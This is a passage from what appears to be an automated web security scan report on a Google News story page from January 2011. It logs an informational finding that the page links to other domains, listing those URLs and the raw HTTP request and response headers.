<span class="title"><a target="_blank" class="usg-AFQjCNF0sJpX5iFReuTSkI-eJ2x5QatHcA " href="http://www.nytimes.com/2011/01/24/business/24fees.html?src=busln" id="-6745807016666702947"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFu_9RyhYijNKzwJqwfe2g-y3O7vA " href="http://www.chicagotribune.com/news/local/breaking/chibrknews-court-rules-against-emanuel-on-01242011,0,4083659.story" id="6711712754283306360"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHT_jvJT_yNF5cx8BE3V88ObIMsfQ " href="http://online.wsj.com/article/SB10001424052748704881304576094000352599050.html" id="3419897226598733059"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHe-laFgexyFrmfE7lXlS-da3UXCA " href="http://mashable.com/2011/01/20/google-offers/" id="-2235673424111835580"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEsz7_xejPP6VsD3NuWdHvxda40Kg " href="http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html" id="1375770744202528156"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGabipshqDpEThvts4Js4ElbcfX_A " href="http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/" id="8662120574501095458"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGLZSeleCrQ4gBas6xZiwZUPYDCYQ " href="http://www.huffingtonpost.com/2011/01/17/starbucks-new-size-trenta-graphic_n_810083.html" id="-6583013401083455589"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIKm4Fup2J5xjAnEf8e9q0nfSP0Q " href="http://www.nytimes.com/2011/01/18/opinion/18brooks.html" id="5024855345474111787"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGQCd1rS9GL5PNAUudI5RpsxmOAbQ " href="http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/" id="-7783858872244448158"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEIqQNaGnqPT81jx2kLrr0Da_XsHg " href="http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln" id="6107526647097459892"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEQX0__xR6F03eNBD80wQ9ztviVrQ " href="http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html" id="6905605053023830163"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHmXxgsr2Peqa9XqIE5wJgWC0cf0w " href="http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162" id="-8119849514259291457"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGpLGEB4oQts2tE3LiQynQ3Z-K5RQ " href="http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844" id="7279004896616451596"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNE6ybBw84x9uoypftV5tngJHzOltg " href="http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/" id="6382990014983290027"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG6VFJsd5LghOJQDRVmX0-Z39bpvg " href="http://mashable.com/2011/01/12/obsessed-with-facebook-infographic/" id="-5027991129252007488"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGefgxSphxOT7DWIJfYen2FHqVKeA " href="http://www.huffingtonpost.com/2011/01/13/new-zodiac-sign-dates-oph_n_808567.html" id="2526493708698605676"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNGguw_7ImLDpzcb2GdQY0b690KAjA " href="http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html" id="6034302388163933602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNG31ieJjehuVhbmm8A6VoEwB34ufg " href="http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/" id="-5002562622630809801"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEBCqmXL7Go4fAtoGveE-Ftib_JTA " href="http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html" id="5830623823895293286"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNHctKe5Y-WBhY6hGZFBttgAQRB3-Q " href="http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/" id="1409758142476247527"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEkadxsOjF3ACMoM7ayuBEhtjIiRw " href="http://www.wired.com/threatlevel/2011/01/twitter/" id="-198025857784313602"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNFyXWaX3UnCdLqv5YPYdbvsndnWkg " href="http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages" id="-2612389445387481788"><span class="titletext">
...[SNIP]...
<span class="title"><a target="_blank" class="usg-AFQjCNEK4OuQ5vLuSdUivCvstxdy78zHhA " href="http://www.slate.com/id/2281146/" id="-303322691301458140"><span class="titletext">
...[SNIP]...
<div class="goog-menuitem" id="s-email"><img class="icon email-icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="15" height="15" alt="Share story by email"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-reader-titleurl" value="url"><img class="share-icon-reader icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Google Reader Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-fb-titleurl" value="u"><img class="share-icon-facebook icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Facebook Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-twitter-shareurl" value="http://twitter.com/home"><img class="share-icon-twitter icon" src="http://www.gstatic.com/news/img/cleardot.gif" width="16" height="16" alt="Share story with Twitter Share story"><span class="sharing-link">
...[SNIP]...
<input type="hidden" id="s-buzz-titleurl" value="url"><img class="icon share-icon-buzz" src="http://www.gstatic.com/news/img/cleardot.gif" alt="Buzz this story"><span class="sharing-link">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a> - <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

20.106. http://news.google.com/news/story previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.google.com
Path:	/news/story

Issue detail

The page was loaded from a URL containing a query string:

http://news.google.com/news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddEQewEuUXr-br5MJHZzY7RO2mw5NM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d13\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIMBEKoCMAw\\x22

The response contains the following links to other domains:

http://abcnews.go.com/Business/wireStory?id=12751095
http://abcnews.go.com/US/jared-loughner-accused-tucson-shooter-smiles-court-appearance/story?id=12750000
http://abcnews.go.com/US/wireStory?id=12742296
http://allafrica.com/stories/201101242014.html
http://arstechnica.com/gadgets/news/2011/01/report-motorola-xoom-to-launch-february-17-for-around-700.ars
http://arstechnica.com/web/news/2011/01/mozilla-google-take-different-approaches-to-user-tracking-opt-out.ars
http://business.newsfactor.com/story.xhtml?story_id=12000005I4S0
http://chicago.gopride.com/news/article.cfm/articleid/16138036
http://chicagobreakingbusiness.com/2011/01/cantor-declares-state-bankruptcy-law-doa.html
http://content.usatoday.com/communities/campusrivalry/post/2011/01/dukes-coach-k-says-chicago-bears-qb-jay-cutler-should-support-team/1
http://content.usatoday.com/communities/ondeadline/post/2011/01/bbc-at-least-10-killed-in-explosion-at-moscow-airport/1?csp=hf
http://content.usatoday.com/communities/onpolitics/post/2011/01/michele-bachmann-tea-party-sotu-response-/1
http://content.usatoday.com/communities/thehuddle/post/2011/01/donald-driver-super-bowl-vs-steelers-is-packers-to-lose/1
http://content.usatoday.com/communities/thehuddle/post/2011/01/rex-ryan-jets-have-to-learn-to-beat-more-than-just-patriots/1
http://dallas.sbnation.com/dallas-cowboys/2011/1/24/1953866/super-bowl-xlv-in-dallas-christina-aguilera-to-sing-national-anthem
http://edition.cnn.com/2011/WORLD/americas/01/24/tunisia.canada.ben.ali/
http://en.rian.ru/russia/20110125/162282705.html
http://english.aljazeera.net/news/africa/2011/01/2011124163051778391.html
http://english.aljazeera.net/palestinepapers/2011/01/201112412224387862.html
http://espn.go.com/blog/boston/new-england-patriots/post?id=4692316
http://espn.go.com/espn/page2/index?id=6054739
http://feeds.nytimes.com/click.phdo?i=1134bc987ca2a36b4b35055e16a29639
http://feeds.nytimes.com/click.phdo?i=7700bb1615b746aacc097462c73508b7
http://fifthdown.blogs.nytimes.com/2011/01/24/lovie-smith-defends-an-embattled-cutler/
http://googlenewsblog.blogspot.com/
http://health.usnews.com/health-news/family-health/heart/articles/2011/01/24/lowering-bp-can-help-cut-womens-heart-disease-risk.html
http://i.ytimg.com/vi/Ay5CfV-_438/default.jpg
http://i.ytimg.com/vi/Oy3zTTuXoPU/default.jpg
http://i.ytimg.com/vi/QMHmzs0RsUA/default.jpg
http://i.ytimg.com/vi/V36fQu0Vk80/default.jpg
http://i.ytimg.com/vi/jKYkFgMz7fQ/default.jpg
http://idolator.com/5748782/christina-aguilera-super-bowl
http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/brady-mayo-mankins-named-all-pro/
http://itiswhatitis.weei.com/sports/newengland/football/patriots/2011/01/24/rex-ryan-jets-have-done-a-pretty-good-job-of-beating-patriots/
http://latimesblogs.latimes.com/money_co/2011/01/eric-cantor-states-bankruptcy-bailouts-house-majority-leader-gingrich.html
http://latino.foxnews.com/latino/politics/2011/01/24/rahm-emanuel-chicago-mayoral-race-opening-latino-candidates/
http://mashable.com/2011/01/12/obsessed-with-facebook-infographic/
http://mashable.com/2011/01/20/google-offers/
http://mashable.com/2011/01/24/engaging-facebook-fans/
http://montreal.ctv.ca/servlet/an/local/CTVNews/20110124/giffords-shooting-case-110124/20110124/?hub=MontrealHome
http://musketfire.com/2011/01/24/three-patriots-make-the-all-pro-team/
http://mystateline.com/fulltext-news/?nxd_id=223216
http://nbcsports.msnbc.com/id/41239129/ns/sports-player_news/
http://news.blogs.cnn.com/2011/01/11/snow-present-in-49-of-the-50-u-s-states/
http://news.blogs.cnn.com/2011/01/13/no-your-zodiac-sign-hasnt-changed/
http://news.blogs.cnn.com/2011/01/23/jack-lalanne-dead-at-96/
http://news.blogs.cnn.com/2011/01/24/explosion-rocks-moscow-airport/
http://news.cnet.com/8301-17852_3-20029268-71.html
http://news.nationalgeographic.com/news/2011/01/110119-yellowstone-park-supervolcano-eruption-magma-science/
http://newsroom.mtv.com/2011/01/24/christina-aguilera-super-bowl-national-anthem/
http://nt0.ggpht.com/news/tbn/4MailUtGZpNvBM/6.jpg
http://nt0.ggpht.com/news/tbn/qMklKOy43j6_5M/6.jpg
http://nt0.ggpht.com/news/tbn/sF9Yx43EuUfcmM/6.jpg
http://nt1.ggpht.com/news/tbn/-ZSVDVOrR4x4PM/6.jpg
http://nt1.ggpht.com/news/tbn/0fcME5GA0IOcZM/6.jpg
http://nt1.ggpht.com/news/tbn/4Qx6t9NgLfRlrM/6.jpg
http://nt1.ggpht.com/news/tbn/8VFR3JrwXIVmeM/6.jpg
http://nt1.ggpht.com/news/tbn/EQcHoTDMlXOzmM/6.jpg
http://nt1.ggpht.com/news/tbn/PTWrrKWFPhkNhM/6.jpg
http://nt1.ggpht.com/news/tbn/daFSu9xUqylQ5M/6.jpg
http://nt1.ggpht.com/news/tbn/naj4TdD_2Xxs5M/6.jpg
http://nt2.ggpht.com/news/tbn/4qo0wQiEBATaaM/6.jpg
http://nt2.ggpht.com/news/tbn/_lRM2j82QTbMDM/6.jpg
http://nt2.ggpht.com/news/tbn/gsPtXlmrvQGLtM/6.jpg
http://nt3.ggpht.com/news/tbn/E4wG-9FiV5eTAM/6.jpg
http://nt3.ggpht.com/news/tbn/M2eWhkFHXWq5TM/6.jpg
http://nt3.ggpht.com/news/tbn/PxjjM3Orb87AzM/6.jpg
http://nt3.ggpht.com/news/tbn/T-Xfzw4FP6yhAM/6.jpg
http://nt3.ggpht.com/news/tbn/g54p1BDYwrB4oM/6.jpg
http://nt3.ggpht.com/news/tbn/lwOfOh7k2QfPWM/6.jpg
http://nt3.ggpht.com/news/tbn/mwTGtKZ4NInPwM/6.jpg
http://nt3.ggpht.com/news/tbn/w_tEYbzpZ15crM/6.jpg
http://nt3.ggpht.com/news/tbn/z55aFPv78aqfWM/6.jpg
http://online.wsj.com/article/APa59ba6dc9ce0453e8a616202c7484b68.html
http://online.wsj.com/article/BT-CO-20110124-713737.html
http://online.wsj.com/article/SB10001424052748703555804576102341574484526.html?mod=googlenews_wsj
http://online.wsj.com/article/SB10001424052748703555804576102430334731152.html?mod=googlenews_wsj
http://online.wsj.com/article/SB10001424052748703951704576092371207903438.html
http://online.wsj.com/article/SB10001424052748703954004576090020541379588.html
http://online.wsj.com/article/SB10001424052748704111504576059713528698754.html
http://online.wsj.com/article/SB10001424052748704279704576102242255911216.html?mod=googlenews_wsj
http://online.wsj.com/article/SB10001424052748704279704576102300534990160.html?mod=googlenews_wsj
http://online.wsj.com/article/SB10001424052748704881304576094000352599050.html
http://ozarksfirst.com/fulltext?nxd_id=391716
http://pheedo.msnbc.msn.com/click.phdo?i=ece7dfeabc52f4bea351b7e1dc14b312
http://popwatch.ew.com/2011/01/24/oprah-half-sister-family-secret/
http://profootballtalk.nbcsports.com/2011/01/24/final-cutler-injury-update-grade-ii-mcl-tear/
http://profootballtalk.nbcsports.com/2011/01/24/packers-fans-not-happy-with-treatment-in-chicago/
http://sports.espn.go.com/chicago/nfl/news/story?id=6054809
http://sports.espn.go.com/new-york/nfl/news/story?id=6054732&campaign=rss&source=NFLHeadlines
http://sportsillustrated.cnn.com/2011/writers/paul_daugherty/01/24/jay.cutler/
http://techland.time.com/2011/01/24/motorola-xoom-tablet-tipped-for-february-17-release-at-700/
http://theweek.com/article/index/211389/oprahs-half-sister-revelation-a-publicity-stunt
http://tpmdc.talkingpointsmemo.com/2011/01/republicans-in-a-fix-on-infrastructure-spending.php
http://voices.washingtonpost.com/44/2011/01/eric-cantor-president-obama-wa.html
http://voices.washingtonpost.com/capitalsinsider/matt-hendricks/video-matt-hendricks-answers-y.html
http://voices.washingtonpost.com/capitalsinsider/new-york-rangers/capitals-seek-more-than-redemp.html
http://voices.washingtonpost.com/dr-gridlock/2011/01/bill_would_allow_mcdonnell_to.html
http://voices.washingtonpost.com/fasterforward/2011/01/reports_xoom_release_date_is_f.html
http://weeklyworldnews.com/headlines/27321/facebook-will-end-on-march-15th/
http://www.9and10news.com/Category/Story/?id=279641&cID=3
http://www.ajc.com/sports/jets-qb-sanchez-optimistic-814203.html
http://www.allheadlinenews.com/briefs/articles/90031962?Christina%20Aguilera%20to%20perform%20National%20Anthem%20at%20this%20year's%20Super%20Bowl
http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12270504
http://www.bbc.co.uk/news/uk-12225163
http://www.bizjournals.com/stlouis/news/2011/01/24/creve-coeur-to-lose-smurfit-stone-hq.html
http://www.bloomberg.com/news/2011-01-22/obama-to-stress-competitiveness-job-creation-deficit-reduction-in-speech.html
http://www.bloomberg.com/news/2011-01-24/bachmann-s-tea-party-caucus-to-host-high-court-justice-scalia.html
http://www.bloomberg.com/news/2011-01-24/heart-disease-treatment-cost-to-triple-to-818-billion-by-2030-group-says.html
http://www.bloomberg.com/news/2011-01-24/summary-box-ivory-coast-might-ban-cocoa-exports.html
http://www.bloomberg.com/news/2011-01-24/twitter-s-advertising-revenue-may-triple-to-150-million-emarketer-says.html
http://www.boston.com/sports/football/patriots/extra_points/2011/01/tom_brady_unani.html
http://www.bostonherald.com/sports/football/patriots/view.bg?articleid=1311662&srvc=rss
http://www.businessinsider.com/wow-how-oprahs-half-sister-discovered-they-were-related-2011-1
http://www.businessweek.com/lifestyle/content/healthday/649165.html
http://www.businessweek.com/news/2011-01-24/loughner-pleads-not-guilty-to-attempted-murder-charges.html
http://www.catholic.org/ae/celebrity/story.php?id=40071
http://www.cbc.ca/arts/tv/story/2011/01/24/oprah-reunion.html
http://www.cbsnews.com/8301-503544_162-20029369-503544.html
http://www.cbsnews.com/8301-503544_162-20029390-503544.html
http://www.cbsnews.com/stories/2011/01/24/ap/strange/main7278196.shtml
http://www.chicagobreakingsports.com/2011/01/bears-cutler-suffers-sprain-of-mcl-in-left-knee.html
http://www.chicagobreakingsports.com/2011/01/bears-teammates-rally-behind-besieged-cutler.html
http://www.chicagotribune.com/news/local/breaking/chibrknews-court-rules-against-emanuel-on-01242011,0,4083659.story
http://www.chron.com/disp/story.mpl/ap/tx/7395456.html
http://www.cnn.com/2011/CRIME/01/24/michigan.rape.suspect/?hpt=T2
http://www.cnn.com/2011/POLITICS/01/24/obama.word/
http://www.cnn.com/2011/US/01/21/scotus.scalia.tea.party/
http://www.cnn.com/2011/WORLD/africa/01/24/winds.change/?hpt=C1
http://www.cnngo.com/explorations/life/12-coolest-nationalities-earth-050844
http://www.computerworld.com/s/article/9206061/Google_jumps_into_Do_Not_Track_debate_with_Chrome_add_on?taxonomyId=84
http://www.computerworld.com/s/article/9206080/Motorola_Xoom_to_launch_on_Feb._17_priced_at_700_report_says
http://www.csmonitor.com/USA/2011/0124/Rahm-Emanuel-ruling-big-setback-at-a-crucial-time-in-Chicago-mayor-s-race
http://www.csmonitor.com/USA/Politics/The-Vote/2011/0124/Scalia-addresses-Tea-Party-Caucus-but-should-he
http://www.csmonitor.com/World/Middle-East/2011/0124/Tunisia-s-opposition-defends-unity-government-as-pressure-mounts
http://www.ctv.ca/CTVNews/TopStories/20110122/tunisia-montreal-110122/
http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_1
http://www.dailytimes.com.pk/default.asp?page=2011%5C01%5C25%5Cstory_25-1-2011_pg4_3
http://www.detnews.com/article/20110124/METRO01/101240374/1409/metro/Detroit-rape-suspect--31--has-spent-almost-half-his-life-in-prison
http://www.digitaltrends.com/computing/twitter-advertising-revenue-swiftly-challenging-myspace/
http://www.emarketer.com/Article.aspx?R=1008192
http://www.foxnews.com/entertainment/2011/01/24/biggest-fitness-guru-time/
http://www.foxnews.com/health/2011/01/24/report-heart-disease-costs-triple/
http://www.foxnews.com/world/2011/01/24/ap-interview-iaea-critical-irans-cooperation/
http://www.freep.com/article/20110124/NEWS05/101240382/1007/news05/4-officers-shot-gunman-dead-in-horrifying-attack
http://www.gstatic.com/news/img/cleardot.gif
http://www.gstatic.com/news/img/favicon.ico
http://www.gstatic.com/news/img/logo/en_us/news.gif
http://www.guardian.co.uk/media/2011/jan/08/us-twitter-hand-icelandic-wikileaks-messages
http://www.guardian.co.uk/world/2011/jan/24/domodedovo-airport-bomb-security
http://www.guardian.co.uk/world/2011/jan/24/moscow-airport-bomb-kills-dozens
http://www.guardian.co.uk/world/2011/jan/24/papers-palestinian-leaders-refugees-fight
http://www.huffingtonpost.com/2011/01/13/new-zodiac-sign-dates-oph_n_808567.html
http://www.huffingtonpost.com/2011/01/17/starbucks-new-size-trenta-graphic_n_810083.html
http://www.huffingtonpost.com/2011/01/20/two-suns-twin-stars_n_811864.html
http://www.idahostatejournal.com/news/national/article_4f292c44-2808-11e0-86d1-001cc4c03286.html
http://www.jpost.com/MiddleEast/Article.aspx?id=205065
http://www.jsonline.com/news/milwaukee/114509574.html
http://www.ksby.com/news/locals-work-out-in-honor-of-the-late-fitness-guru-jack-lalanne
http://www.latimes.com/news/local/la-me-mega-storm-20110123,0,1868244.story
http://www.latimes.com/news/local/la-me-surfer-mavericks-20110124,0,4017331.story
http://www.latimes.com/news/obituaries/la-me-jack-lalanne-20110124,0,6764075.story
http://www.longislandpress.com/2011/01/24/oprahs-sister-oprahs-half-sister/
http://www.marketwatch.com/story/rocktenn-to-buy-smurfit-stone-for-35-billion-2011-01-24
http://www.mercurynews.com/breaking-news/ci_17184991
http://www.miamiherald.com/2011/01/21/v-fullstory/2028085/they-were-ambushed.html
http://www.miamiherald.com/2011/01/24/2031135/slain-officers-funeral-procession.html?asset_id=Funeral%20procession%20for%20slain%20Miami-Dade%20officers&asset_type=html_module
http://www.missourinet.com/2011/01/24/st-louis-based-smurfit-stone-sells-for-3-5b/
http://www.msnbc.msn.com/id/41220540/ns/business-motley_fool/
http://www.msnbc.msn.com/id/41234780/ns/health-heart_health/
http://www.msnbc.msn.com/id/41238598/ns/world_news-europe/
http://www.naturalnews.com/031076_USDA_bird_deaths.html
http://www.newsweek.com/blogs/the-gaggle/2011/01/24/why-no-one-will-watch-the-state-of-the-union.html
http://www.nfl.com/news/story/09000d5d81de4791/article/steelers-packers-provide-plan-for-others-to-find-success
http://www.ny1.com/content/news_beats/politics/132719/suspect-in-arizona-shooting-pleads-not-guilty/Default.aspx
http://www.nytimes.com/2011/01/18/opinion/18brooks.html
http://www.nytimes.com/2011/01/20/business/20walmart.html?src=busln
http://www.nytimes.com/2011/01/23/books/review/Paul-t.html
http://www.nytimes.com/2011/01/24/business/24fees.html?src=busln
http://www.nytimes.com/2011/01/24/technology/24cook.html
http://www.nytimes.com/2011/01/24/us/24detroit.html?src=twrhp
http://www.oregonlive.com/politics/index.ssf/2011/01/2011_state_of_the_union_-_poli.html
http://www.pcmag.com/article2/0,2817,2376161,00.asp
http://www.pcmag.com/article2/0,2817,2376180,00.asp
http://www.pcmag.com/article2/0,2817,2376185,00.asp
http://www.pcworld.com/businesscenter/article/217478/firefox_donottrack_feature_has_a_fatal_flaw.html
http://www.pcworld.com/businesscenter/article/217509/motorola_xoom_tablets_price_will_shoot_it_in_the_foot.html
http://www.people.com/people/article/0,,20460315,00.html
http://www.politico.com/news/stories/0111/48043.html
http://www.prnewswire.com/news-releases/american-heart-association-rapid-access-journal-report-lowering-blood-pressure-in-middle-aged-women-reduces-heart-disease-risk-114504829.html
http://www.reuters.com/article/idUS198178545820110124
http://www.reuters.com/article/idUSN2419720820110124
http://www.reuters.com/article/idUSN2419775920110124
http://www.reuters.com/article/idUSTRE70N2TQ20110124
http://www.reuters.com/article/idUSTRE70N4AE20110124
http://www.reuters.com/article/idUSTRE70N4VB20110124
http://www.reuters.com/article/idUSTRE70N5P220110124
http://www.reuters.com/article/idUSTRE70N5SV20110124
http://www.reuters.com/article/idUSTRE70N5ZW20110124
http://www.reuters.com/article/idUSTRE70N66I20110124
http://www.reuters.com/article/idUSTRE70N6Q420110124
http://www.reuters.com/article/idUSTRE70N6U520110124
http://www.rotoworld.com/content/playerpages/playerbreakingnews.asp?sport=NFL&id=1163&line=199317&spln=1
http://www.slate.com/id/2281146/
http://www.sportingnews.com/nfl/feed/2011-01/super-bowl-xlv/story/roethlisberger-rodgers-look-to-bounce-back-in-super-bowl
http://www.suntimes.com/3470538-417/court-emanuel-appellate-chicago-law.html
http://www.technewsworld.com/story/Firefox-Do-Not-Track-Feature-Seen-as-Toothless-71710.html
http://www.telegraph.co.uk/news/worldnews/northamerica/usa/barackobama/8277266/State-of-the-Union-Barack-Obama-to-use-address-to-rebrand-himself-in-the-centre.html
http://www.theatlantic.com/technology/archive/2011/01/the-inside-story-of-how-facebook-responded-to-tunisian-hacks/70044/
http://www.theglobeandmail.com/news/world/africa-mideast/ivory-coasts-ouattara-calls-for-cocoa-export-ban/article1880409/
http://www.theglobeandmail.com/news/world/americas/gunman-killed-4-officers-injured-in-detroit-shooting/article1880253/
http://www.theglobeandmail.com/news/world/emanuels-name-removed-from-ballot-for-chicago-mayor-lawyer-says/article1880888/
http://www.theglobeandmail.com/sports/football/packers-headed-to-super-bowl/article1880207/
http://www.theglobeandmail.com/sports/football/tom-brady-a-unanimous-ap-all-pro/article1881082/
http://www.thehollywoodgossip.com/2011/01/christina-aguilera-to-sing-national-anthem-at-super-xlv/
http://www.thestar.com/sports/football/article/927264--super-bowl-notes-aguilera-to-croon-anthem
http://www.thestreet.com/story/10982553/1/tax-preparation-halliburton-hot-trends.html?cm_ven=GOOGLEN
http://www.thirdage.com/news/rock-tenn-buys-smurfit-stone-35-billion_1-24-2011
http://www.usatoday.com/news/nation/2011-01-24-detroit-shooting_N.htm
http://www.usatoday.com/yourlife/fitness/exercise/2011-01-25-lalanneobit24_ST_N.htm?csp=ylf
http://www.vanityfair.com/online/daily/2011/01/justin-bieber-on-his-musical-inspirations-his-fans-and-trying-to-be-a-regular-kid.html
http://www.voanews.com/english/news/Blast-Kills-At-Least-10-at-Moscow-Airport-114481529.html
http://www.voanews.com/english/news/africa/Nigeria-Wants-UN-Backing-for-Military-Intervention-in-Ivory-Coast-114510399.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/20/AR2011012004349.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/21/AR2011012106553.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404718.html
http://www.washingtonpost.com/wp-dyn/content/article/2011/01/24/AR2011012404850.html
http://www.webmd.com/heart-disease/news/20110123/heart-disease-treatment-costs-may-triple-in-next-20-years
http://www.wired.com/epicenter/2011/01/google-voice-lsd-trip/
http://www.wired.com/epicenter/2011/01/times-paywall/
http://www.wired.com/gadgetlab/2011/01/windows-phone-7-jailbreakers/
http://www.wired.com/threatlevel/2011/01/twitter/
http://www.youtube.com/?hl=en&tab=n1
http://www.youtube.com/watch?v=1wbQ-zmLKqg
http://www.youtube.com/watch?v=3i4eR4POFOw
http://www.youtube.com/watch?v=6_dUkNdoPZI
http://www.youtube.com/watch?v=90gldve1V1g
http://www.youtube.com/watch?v=A1JzTAhSoKA
http://www.youtube.com/watch?v=Ay5CfV-_438
http://www.youtube.com/watch?v=Dye1RPvkcB0
http://www.youtube.com/watch?v=Id_W6wgEIGo
http://www.youtube.com/watch?v=Oy3zTTuXoPU
http://www.youtube.com/watch?v=QMHmzs0RsUA
http://www.youtube.com/watch?v=V36fQu0Vk80
http://www.youtube.com/watch?v=jKYkFgMz7fQ
http://www.youtube.com/watch?v=pUzMhGLMFgQ
http://www.youtube.com/watch?v=uwXNpYAgahg
http://www.zdnet.com/blog/burnette/oops-no-copied-java-code-or-weapons-of-mass-destruction-found-in-android/2162
http://www.zeenews.com/news682964.html

Request

GET /news/story?hl\\x3den\\x26amp;sugexp\\x3dldymls\\x26amp;xhr\\x3dt\\x26amp;q\\x3damazon\\x26amp;cp\\x3d1\\x26amp;um\\x3d1\\x26amp;ie\\x3dUTF-8\\x26amp;ncl\\x3ddEQewEuUXr-br5MJHZzY7RO2mw5NM\\x26amp;ei\\x3dh5I9TauLMMK88gazprSzCg\\x26amp;sa\\x3dX\\x26amp;oi\\x3dnews_result\\x26amp;ct\\x3dmore-results\\x26amp;resnum\\x3d13\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CIMBEKoCMAw\\x22 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: NID=43=cX57RyFcFhGXeBWYxGmdKRnJK5jU8LbzJUkskuOo3Xc0yCG6_QYKJl1hNiPV-8JP_2-ZrXSXQum39SgiJNEagRRJAzOJp6wHI1J_d2-Na0Ybn57rjbe8j4n3t1ZfBDgJ;Domain=.google.com;Path=/;Expires=Tue, 26-Jul-2011 22:43:14 GMT;HttpOnly
Date: Mon, 24 Jan 2011 22:43:14 GMT
Expires: Mon, 24 Jan 2011 22:43:14 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&cf=all&ned=us&hl=en&topic=h&num=3&output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<span class="sel"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
